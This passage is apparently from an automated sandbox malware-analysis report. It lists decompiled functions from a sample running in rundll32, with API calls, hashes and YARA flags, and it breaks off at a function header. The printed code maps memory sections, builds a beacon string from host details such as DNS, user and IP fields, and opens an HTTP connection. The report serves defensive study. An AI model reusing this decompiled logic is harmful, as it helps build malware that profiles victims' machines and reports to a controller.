                            0x04a11973
                            0x04a11979
                            0x04a1197e
                            0x04a11982
                            0x04a119a0
                            0x04a11984
                            0x04a1198b
                            0x04a11999
                            0x04a11999
                            0x04a11982
                            0x04a119b1

                            APIs
                            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,761B4EE0,00000000,00000000,04A1459D), ref: 04A11969
                              • Part of subcall function 04A16D0A: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,04A1197E,00000002,00000000,?,?,00000000,?,?,04A1197E,00000000), ref: 04A16D37
                            • memset.NTDLL ref: 04A1198B
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Section$CreateViewmemset
                            • String ID:
                            • API String ID: 2533685722-0
                            • Opcode ID: 39c6781f9f66cf2048ae46488313ef5fadf544eee56d406a9c41bd712d4d7bd0
                            • Instruction ID: 3e7c116ce9f6b163876086b780bfca11a5ad5c61f29ae8acb0d4d0fe55827e7b
                            • Opcode Fuzzy Hash: 39c6781f9f66cf2048ae46488313ef5fadf544eee56d406a9c41bd712d4d7bd0
                            • Instruction Fuzzy Hash: 0D211FB5D00209AFDB11DFA9C8849EEFBF9EF48354F144829E615F3210D730AA488B65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7A806 Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcAddress.KERNEL32(?,00000000), ref: 04F7A82F
                            • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04F76230,00000000,00000000,00000028,00000100), ref: 04F7A851
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressMemory64ProcReadVirtualWow64
                            • String ID:
                            • API String ID: 752694512-0
                            • Opcode ID: 36ecbd1f4f3779a00260ce2a7d1305e6065dcceefb6e905214c396badc4efedd
                            • Instruction ID: 8c752e499c044ecce71bb8e0bc5bc882846ebfe8336fec7976bd0fbdf27237c2
                            • Opcode Fuzzy Hash: 36ecbd1f4f3779a00260ce2a7d1305e6065dcceefb6e905214c396badc4efedd
                            • Instruction Fuzzy Hash: A7F01D76900508FFCB128F99EC44CAEBBB9EB88710B14411EF904CB220D379E952DF20
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7BE80 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtMapViewOfSection.NTDLL(00000000,000000FF,04F6717E,00000000,00000000,04F6717E,?,00000002,00000000,?,04F6C71A,00000000,04F6717E,000000FF,?), ref: 04F7BEAE
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: SectionView
                            • String ID:
                            • API String ID: 1323581903-0
                            • Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                            • Instruction ID: dcd39304411b7992983ef1939e4e4e7b094b5abe68ebc40e11e1211eadc4aef2
                            • Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                            • Instruction Fuzzy Hash: 23F012B690020CFFDB119FA5CC85CDFBBBDEB44344B00882AF642D5150D231AE199B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A16D0A Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 68%
                            			E04A16D0A(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                            0x04a16d1c
                            0x04a16d22
                            0x04a16d30
                            0x04a16d37
                            0x04a16d3c
                            0x04a16d42
                            0x00000000
                            0x04a16d43
                            0x00000000

                            APIs
                            • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,04A1197E,00000002,00000000,?,?,00000000,?,?,04A1197E,00000000), ref: 04A16D37
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: SectionView
                            • String ID:
                            • API String ID: 1323581903-0
                            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                            • Instruction ID: c24c3ef97fc25ba9c40d5cc1ee3f50ea84041a10fe7adc20b8a9baa9901e43eb
                            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                            • Instruction Fuzzy Hash: 07F037B590060CFFDB119FA5CC85C9FBBBDEB44394F104939F152E50A0D630AE089B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F674AE Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,04F8A400), ref: 04F674C5
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: InformationProcessQuery
                            • String ID:
                            • API String ID: 1778838933-0
                            • Opcode ID: f7fe5d42370105294ebcd18b5390238de3f0b52fb035120fe880389be4dd7daa
                            • Instruction ID: 1954cec9ef24f01ca03a3b7d02c0c5adb5127432468720afadf76faebeb9e8be
                            • Opcode Fuzzy Hash: f7fe5d42370105294ebcd18b5390238de3f0b52fb035120fe880389be4dd7daa
                            • Instruction Fuzzy Hash: 8FF05E31B00159DBC720EE69E888EABBBE9FB45758B104114ED06DB260D734FD06CBE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A156C8 Relevance: 39.2, APIs: 26, Instructions: 234memorystringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 70%
                            			E04A156C8(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				intOrPtr _t32;
				void* _t33;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t39;
				void* _t42;
				intOrPtr _t43;
				int _t46;
				intOrPtr _t47;
				int _t50;
				void* _t51;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				void* _t69;
				intOrPtr _t74;
				intOrPtr _t80;
				intOrPtr _t83;
				intOrPtr _t86;
				int _t89;
				intOrPtr _t90;
				int _t93;
				intOrPtr _t95;
				int _t98;
				intOrPtr _t100;
				int _t103;
				void* _t105;
				void* _t106;
				void* _t110;
				void* _t112;
				void* _t113;
				intOrPtr _t114;
				long _t116;
				intOrPtr* _t117;
				intOrPtr* _t118;
				long _t119;
				int _t120;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t126;
				void* _t127;
				void* _t129;
				void* _t130;

				_t110 = __edx;
				_t106 = __ecx;
				_t127 =  &_v16;
				_t119 = __eax;
				_t32 =  *0x4a1a3e0; // 0x5539b78
				_v4 = _t32;
				_v8 = 8;
				_t33 = RtlAllocateHeap( *0x4a1a2d8, 0, 0x800); // executed
				_t105 = _t33;
				if(_t105 != 0) {
					if(_t119 == 0) {
						_t119 = GetTickCount();
					}
					_t35 =  *0x4a1a018; // 0x59144415
					asm("bswap eax");
					_t36 =  *0x4a1a014; // 0x3a87c8cd
					asm("bswap eax");
					_t37 =  *0x4a1a010; // 0xd8d2f808
					asm("bswap eax");
					_t38 =  *0x4a1a00c; // 0xeec43f25
					asm("bswap eax");
					_t39 =  *0x4a1a348; // 0xb1d5a8
					_t3 = _t39 + 0x4a1b62b; // 0x74666f73
					_t120 = wsprintfA(_t105, _t3, 2, 0x3d175, _t38, _t37, _t36, _t35,  *0x4a1a02c,  *0x4a1a004, _t119);
					_t42 = E04A16927();
					_t43 =  *0x4a1a348; // 0xb1d5a8
					_t4 = _t43 + 0x4a1b66b; // 0x74707526
					_t46 = wsprintfA(_t120 + _t105, _t4, _t42);
					_t129 = _t127 + 0x38;
					_t121 = _t120 + _t46;
					if(_a12 != 0) {
						_t100 =  *0x4a1a348; // 0xb1d5a8
						_t8 = _t100 + 0x4a1b676; // 0x732526
						_t103 = wsprintfA(_t121 + _t105, _t8, _a12);
						_t129 = _t129 + 0xc;
						_t121 = _t121 + _t103;
					}
					_t47 =  *0x4a1a348; // 0xb1d5a8
					_t10 = _t47 + 0x4a1b2de; // 0x74636126
					_t50 = wsprintfA(_t121 + _t105, _t10, 0);
					_t130 = _t129 + 0xc;
					_t122 = _t121 + _t50; // executed
					_t51 = E04A122D7(_t106); // executed
					_t112 = _t51;
					if(_t112 != 0) {
						_t95 =  *0x4a1a348; // 0xb1d5a8
						_t12 = _t95 + 0x4a1b8d0; // 0x736e6426
						_t98 = wsprintfA(_t122 + _t105, _t12, _t112);
						_t130 = _t130 + 0xc;
						_t122 = _t122 + _t98;
						HeapFree( *0x4a1a2d8, 0, _t112);
					}
					_t113 = E04A12A11();
					if(_t113 != 0) {
						_t90 =  *0x4a1a348; // 0xb1d5a8
						_t14 = _t90 + 0x4a1b8d8; // 0x6f687726
						_t93 = wsprintfA(_t122 + _t105, _t14, _t113);
						_t130 = _t130 + 0xc;
						_t122 = _t122 + _t93;
						HeapFree( *0x4a1a2d8, 0, _t113);
					}
					_t114 =  *0x4a1a3cc; // 0x55395b0
					_a20 = E04A12509(0x4a1a00a, _t114 + 4);
					_t55 =  *0x4a1a370; // 0x0
					_t116 = 0;
					if(_t55 != 0) {
						_t86 =  *0x4a1a348; // 0xb1d5a8
						_t17 = _t86 + 0x4a1b8b2; // 0x3d736f26
						_t89 = wsprintfA(_t122 + _t105, _t17, _t55);
						_t130 = _t130 + 0xc;
						_t122 = _t122 + _t89;
					}
					_t56 =  *0x4a1a36c; // 0x0
					if(_t56 != _t116) {
						_t83 =  *0x4a1a348; // 0xb1d5a8
						_t19 = _t83 + 0x4a1b889; // 0x3d706926
						wsprintfA(_t122 + _t105, _t19, _t56);
					}
					if(_a20 != _t116) {
						_t123 = RtlAllocateHeap( *0x4a1a2d8, _t116, 0x800);
						if(_t123 != _t116) {
							E04A11BE9(GetTickCount());
							_t62 =  *0x4a1a3cc; // 0x55395b0
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x4a1a3cc; // 0x55395b0
							__imp__(_t66 + 0x40);
							_t68 =  *0x4a1a3cc; // 0x55395b0
							_t69 = E04A11D33(1, _t110, _t105,  *_t68); // executed
							_t126 = _t69;
							asm("lock xadd [eax], ecx");
							if(_t126 != _t116) {
								StrTrimA(_t126, 0x4a1928c);
								_push(_t126);
								_t74 = E04A1393C();
								_v20 = _t74;
								if(_t74 != _t116) {
									_t117 = __imp__;
									 *_t117(_t126, _v8);
									 *_t117(_t123, _v8);
									_t118 = __imp__;
									 *_t118(_t123, _v32);
									 *_t118(_t123, _t126);
									_t80 = E04A1375F(0xffffffffffffffff, _t123, _v28, _v24); // executed
									_v56 = _t80;
									if(_t80 != 0 && _t80 != 0x10d2) {
										E04A1561E();
									}
									HeapFree( *0x4a1a2d8, 0, _v48);
									_t116 = 0;
								}
								HeapFree( *0x4a1a2d8, _t116, _t126);
							}
							RtlFreeHeap( *0x4a1a2d8, _t116, _t123); // executed
						}
						HeapFree( *0x4a1a2d8, _t116, _a12);
					}
					RtlFreeHeap( *0x4a1a2d8, _t116, _t105); // executed
				}
				return _v16;
			}





























































                            0x04a156c8
                            0x04a156c8
                            0x04a156c8
                            0x04a156dd
                            0x04a156df
                            0x04a156e4
                            0x04a156e8
                            0x04a156f0
                            0x04a156f6
                            0x04a156fa
                            0x04a15702
                            0x04a1570a
                            0x04a1570a
                            0x04a1570c
                            0x04a15718
                            0x04a15727
                            0x04a1572c
                            0x04a1572f
                            0x04a15734
                            0x04a15737
                            0x04a1573c
                            0x04a1573f
                            0x04a1574b
                            0x04a15758
                            0x04a1575a
                            0x04a15760
                            0x04a15765
                            0x04a15770
                            0x04a15772
                            0x04a15775
                            0x04a1577b
                            0x04a1577d
                            0x04a15786
                            0x04a15791
                            0x04a15793
                            0x04a15796
                            0x04a15796
                            0x04a15798
                            0x04a1579d
                            0x04a157a9
                            0x04a157ab
                            0x04a157ae
                            0x04a157b0
                            0x04a157b5
                            0x04a157b9
                            0x04a157bb
                            0x04a157c0
                            0x04a157cc
                            0x04a157ce
                            0x04a157da
                            0x04a157dc
                            0x04a157dc
                            0x04a157e7
                            0x04a157eb
                            0x04a157ed
                            0x04a157f2
                            0x04a157fe
                            0x04a15800
                            0x04a1580c
                            0x04a1580e
                            0x04a1580e
                            0x04a15814
                            0x04a15827
                            0x04a1582b
                            0x04a15830
                            0x04a15834
                            0x04a15837
                            0x04a1583c
                            0x04a15847
                            0x04a15849
                            0x04a1584c
                            0x04a1584c
                            0x04a1584e
                            0x04a15855
                            0x04a15858
                            0x04a1585d
                            0x04a15867
                            0x04a15869
                            0x04a15870
                            0x04a15888
                            0x04a1588c
                            0x04a15898
                            0x04a1589d
                            0x04a158a6
                            0x04a158b7
                            0x04a158bb
                            0x04a158c4
                            0x04a158ca
                            0x04a158d2
                            0x04a158d7
                            0x04a158e4
                            0x04a158ea
                            0x04a158f6
                            0x04a158fc
                            0x04a158fd
                            0x04a15902
                            0x04a15908
                            0x04a1590e
                            0x04a15915
                            0x04a1591c
                            0x04a15922
                            0x04a15929
                            0x04a1592d
                            0x04a15938
                            0x04a1593d
                            0x04a15943
                            0x04a1594c
                            0x04a1594c
                            0x04a1595d
                            0x04a15963
                            0x04a15963
                            0x04a1596d
                            0x04a1596d
                            0x04a1597b
                            0x04a1597b
                            0x04a1598c
                            0x04a1598c
                            0x04a1599a
                            0x04a1599a
                            0x04a159ab

                            APIs
                            • RtlAllocateHeap.NTDLL ref: 04A156F0
                            • GetTickCount.KERNEL32 ref: 04A15704
                            • wsprintfA.USER32 ref: 04A15753
                            • wsprintfA.USER32 ref: 04A15770
                            • wsprintfA.USER32 ref: 04A15791
                            • wsprintfA.USER32 ref: 04A157A9
                            • wsprintfA.USER32 ref: 04A157CC
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04A157DC
                            • wsprintfA.USER32 ref: 04A157FE
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04A1580E
                            • wsprintfA.USER32 ref: 04A15847
                            • wsprintfA.USER32 ref: 04A15867
                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04A15882
                            • GetTickCount.KERNEL32 ref: 04A15892
                            • RtlEnterCriticalSection.NTDLL(05539570), ref: 04A158A6
                            • RtlLeaveCriticalSection.NTDLL(05539570), ref: 04A158C4
                            • StrTrimA.SHLWAPI(00000000,04A1928C,00000000,055395B0), ref: 04A158F6
                            • lstrcpy.KERNEL32(00000000,?), ref: 04A15915
                            • lstrcpy.KERNEL32(00000000,?), ref: 04A1591C
                            • lstrcat.KERNEL32(00000000,?), ref: 04A15929
                            • lstrcat.KERNEL32(00000000,00000000), ref: 04A1592D
                            • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04A1595D
                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04A1596D
                            • RtlFreeHeap.NTDLL(00000000,00000000,00000000,055395B0), ref: 04A1597B
                            • HeapFree.KERNEL32(00000000,?), ref: 04A1598C
                            • RtlFreeHeap.NTDLL(00000000,00000000), ref: 04A1599A
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Heap$wsprintf$Free$AllocateCountCriticalSectionTicklstrcatlstrcpy$EnterLeaveTrim
                            • String ID:
                            • API String ID: 2591679948-0
                            • Opcode ID: ce7cb0c7c3b06b2b33974e670d59db69d0d8123daefaa0855a84f03b73aed297
                            • Instruction ID: e819d8dbd24c7ded4e32f067baba6e5f26c4f13a73a509c715fe1e479b248686
                            • Opcode Fuzzy Hash: ce7cb0c7c3b06b2b33974e670d59db69d0d8123daefaa0855a84f03b73aed297
                            • Instruction Fuzzy Hash: 1481E3B1901204AFE712EF64EC48E9B3BECEB98710B050525F949D7231D739ED06DB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F634FF Relevance: 21.1, APIs: 14, Instructions: 126memorysynchronizationCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 143 4f634ff-4f63510 144 4f63564-4f6356f 143->144 145 4f63512-4f6351e call 4f61268 call 4f7e869 143->145 147 4f63576-4f63588 call 4f72650 144->147 148 4f63571 call 4f69e82 144->148 159 4f63524-4f63531 SleepEx 145->159 154 4f6358a-4f63597 ReleaseMutex CloseHandle 147->154 155 4f63599-4f635a0 147->155 148->147 154->155 157 4f635a2-4f635af ResetEvent CloseHandle 155->157 158 4f635b1-4f635be SleepEx 155->158 157->158 158->158 160 4f635c0 158->160 159->159 161 4f63533-4f6353a 159->161 162 4f635c5-4f635d2 SleepEx 160->162 163 4f63550-4f63562 RtlDeleteCriticalSection * 2 161->163 164 4f6353c-4f63542 161->164 165 4f635d4-4f635d9 162->165 166 4f635db-4f635e2 162->166 163->144 164->163 167 4f63544-4f6354b call 4f7e803 164->167 165->162 165->166 168 4f635e4-4f635ed HeapFree 166->168 169 4f635f3-4f635fa 166->169 167->163 168->169 171 4f63602-4f63608 169->171 172 4f635fc-4f635fd call 4f783fa 169->172 173 4f6360a-4f63611 171->173 174 4f63619-4f63620 171->174 172->171 173->174 176 4f63613-4f63615 173->176 177 4f63622-4f63623 RtlRemoveVectoredExceptionHandler 174->177 178 4f63629-4f6362f 174->178 176->174 177->178 179 4f63636 178->179 180 4f63631 call 4f69131 178->180 182 4f6363b-4f63648 SleepEx 179->182 180->179 183 4f63651-4f6365a 182->183 184 4f6364a-4f6364f 182->184 185 4f63672-4f63682 LocalFree 183->185 186 4f6365c-4f63661 183->186 184->182 184->183 186->185 187 4f63663 186->187 188 4f63666-4f63670 FindCloseChangeNotification 187->188 188->185 188->188
                            APIs
                            • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04F7E846), ref: 04F63528
                            • RtlDeleteCriticalSection.NTDLL(04F8A3E0), ref: 04F6355B
                            • RtlDeleteCriticalSection.NTDLL(04F8A400), ref: 04F63562
                            • ReleaseMutex.KERNEL32(000005C8,00000000,?,?,?,04F7E846), ref: 04F6358B
                            • CloseHandle.KERNEL32(?,?,04F7E846), ref: 04F63597
                            • ResetEvent.KERNEL32(00000000,00000000,?,?,?,04F7E846), ref: 04F635A3
                            • CloseHandle.KERNEL32(?,?,04F7E846), ref: 04F635AF
                            • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04F7E846), ref: 04F635B5
                            • SleepEx.KERNEL32(00000064,00000001,?,?,04F7E846), ref: 04F635C9
                            • HeapFree.KERNEL32(00000000,00000000,?,?,04F7E846), ref: 04F635ED
                            • RtlRemoveVectoredExceptionHandler.NTDLL(04FC05B8), ref: 04F63623
                            • SleepEx.KERNEL32(00000064,00000001,?,?,04F7E846), ref: 04F6363F
                            • FindCloseChangeNotification.KERNEL32(0631F2C0,?,?,04F7E846), ref: 04F63668
                            • LocalFree.KERNEL32(?,?,04F7E846), ref: 04F63678
                              • Part of subcall function 04F61268: GetVersion.KERNEL32(?,?,7620F720,?,04F63517,00000000,?,?,?,04F7E846), ref: 04F6128C
                              • Part of subcall function 04F61268: GetModuleHandleA.KERNEL32(?,063197B5,?,7620F720,?,04F63517,00000000,?,?,?,04F7E846), ref: 04F612A9
                              • Part of subcall function 04F61268: GetProcAddress.KERNEL32(00000000), ref: 04F612B0
                              • Part of subcall function 04F7E869: RtlEnterCriticalSection.NTDLL(04F8A400), ref: 04F7E873
                              • Part of subcall function 04F7E869: RtlLeaveCriticalSection.NTDLL(04F8A400), ref: 04F7E8AF
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSectionSleep$CloseHandle$DeleteFree$AddressChangeEnterEventExceptionFindHandlerHeapLeaveLocalModuleMutexNotificationProcReleaseRemoveResetVectoredVersion
                            • String ID:
                            • API String ID: 1047430009-0
                            • Opcode ID: dc3a98eb0f94f4643d19dcbc321e64dd7b5c142d4a4628563a091b2ca05933e6
                            • Instruction ID: 436c85120f8ee381fe2aaded5189c5d91fab1f660a84e4c19bcd33faed0b147a
                            • Opcode Fuzzy Hash: dc3a98eb0f94f4643d19dcbc321e64dd7b5c142d4a4628563a091b2ca05933e6
                            • Instruction Fuzzy Hash: 98414171F0061AABEB20AF65FD84A2577A9EB00B55B45102EE902DF290DB7DFC42CF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A17AF1 Relevance: 19.6, APIs: 13, Instructions: 126networkstringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 92%
                            			E04A17AF1(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E04A16D63(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E04A16C2C(_t56);
					} else {
						E04A16C2C( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E04A17A86) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E04A16E40( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x4a1a348; // 0xb1d5a8
						_t15 = _t59 + 0x4a1b73b; // 0x544547
						_v8 = 0x84404000;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}














                            0x04a17af1
                            0x04a17af1
                            0x04a17afc
                            0x04a17b03
                            0x04a17b0b
                            0x04a17b15
                            0x04a17b1b
                            0x04a17b2e
                            0x04a17b3e
                            0x04a17b30
                            0x04a17b33
                            0x04a17b38
                            0x04a17b38
                            0x04a17b2e
                            0x04a17b4e
                            0x04a17b54
                            0x04a17b59
                            0x04a17c42
                            0x00000000
                            0x04a17b74
                            0x04a17b77
                            0x04a17b8a
                            0x04a17b90
                            0x04a17b95
                            0x04a17bbd
                            0x04a17bd0
                            0x04a17bda
                            0x04a17bdd
                            0x04a17be3
                            0x04a17be8
                            0x00000000
                            0x00000000
                            0x04a17bec
                            0x04a17bf8
                            0x04a17c09
                            0x04a17c0b
                            0x04a17c1c
                            0x04a17c1c
                            0x04a17c2c
                            0x00000000
                            0x04a17c3e
                            0x00000000
                            0x04a17c3e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a17b95

                            APIs
                            • lstrlen.KERNEL32(?,00000008,761B4D40), ref: 04A17B03
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 04A17B26
                            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 04A17B4E
                            • InternetSetStatusCallback.WININET(00000000,04A17A86), ref: 04A17B65
                            • ResetEvent.KERNEL32(?), ref: 04A17B77
                            • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 04A17B8A
                            • GetLastError.KERNEL32 ref: 04A17B97
                            • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 04A17BDD
                            • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 04A17BFB
                            • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 04A17C1C
                            • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 04A17C28
                            • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 04A17C38
                            • GetLastError.KERNEL32 ref: 04A17C42
                              • Part of subcall function 04A16C2C: RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                            • String ID:
                            • API String ID: 2290446683-0
                            • Opcode ID: 47c29439682467225a380820a4027f2d6e246698d311b3b16081147074b26f61
                            • Instruction ID: d45ba47f23c091d50f3748c5e7ecd7307264f7973a830cb24325b86ea54c2bbb
                            • Opcode Fuzzy Hash: 47c29439682467225a380820a4027f2d6e246698d311b3b16081147074b26f61
                            • Instruction Fuzzy Hash: 3241DF75500644BFEB319FA1DD49E6B7BBEEB95B00F105928F503E20B0E734AA41CB20
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A17F35 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
